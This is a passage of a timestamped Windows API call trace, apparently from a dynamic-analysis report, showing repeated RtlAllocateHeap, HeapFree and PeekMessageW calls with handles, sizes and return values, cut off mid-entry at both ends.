lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0191.844] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0191.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0191.844] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0191.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0191.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0191.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0191.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0191.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0191.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0191.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0191.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0191.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0191.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0191.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0191.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0191.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0191.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0191.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0191.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0191.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0191.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0191.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0191.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0191.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0191.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0191.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0191.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0191.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0191.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0191.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.894] RtlAllocateHeap 